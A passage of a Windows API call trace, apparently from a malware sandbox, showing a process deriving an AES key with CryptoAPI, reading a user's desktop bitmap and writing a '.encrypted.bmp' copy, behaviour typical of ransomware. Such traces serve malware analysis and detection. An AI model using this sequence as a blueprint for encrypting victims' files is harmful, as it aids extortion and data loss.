wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.757] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.757] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.757] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.757] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.757] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.757] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.757] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.757] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.757] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.757] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.757] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.757] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.757] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.757] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.757] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.757] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0030.757] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.757] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.758] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.758] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.758] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0030.758] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.758] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.758] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.758] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.758] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.758] CryptHashData (hHash=0x7c2100, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0030.758] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.758] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.758] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.758] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.758] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.758] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.758] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.758] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.758] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0030.758] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.758] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.758] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.758] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.758] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.759] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.759] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0030.759] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.759] CryptDestroyHash (hHash=0x7c2100) returned 1 [0030.759] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.759] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.759] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.759] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.759] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.759] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu\\mq1qqynaiw1i2bdfj.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.759] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.759] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0030.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0030.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0030.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0030.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.759] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0030.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0030.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0030.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0030.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0030.760] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0030.760] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0030.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0030.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c75d0 [0030.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0030.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0030.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0030.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0030.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c75d0 | out: hHeap=0x770000) returned 1 [0030.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0030.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0030.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0030.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0030.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0030.761] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu")) returned 0x10 [0030.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0030.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0030.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.761] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0030.761] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x88ffb0 [0030.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0030.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0030.762] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\mq1QQyNAiW1I2BdfJ.encrypted.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu\\mq1qqynaiw1i2bdfj.encrypted.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0030.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0030.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0030.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0030.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.763] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0030.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0030.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0030.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0030.763] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0030.763] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0030.763] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0030.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0030.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0030.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0030.764] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0030.764] ReadFile (in: hFile=0x128, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0030.767] ReadFile (in: hFile=0x128, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6ae9b8*=0x21b4, lpOverlapped=0x0) returned 1 [0030.767] ReadFile (in: hFile=0x128, lpBuffer=0x936008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x936008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0030.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0030.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x121b4) returned 0x89ffb8 [0030.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0030.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0030.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0030.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x121b4) returned 0x8b2178 [0030.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0030.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.769] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0030.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x121b4) returned 0x89ffb8 [0030.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0030.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0030.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.770] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.770] RtlAllocateHeap (HeapHandle=0x770000, 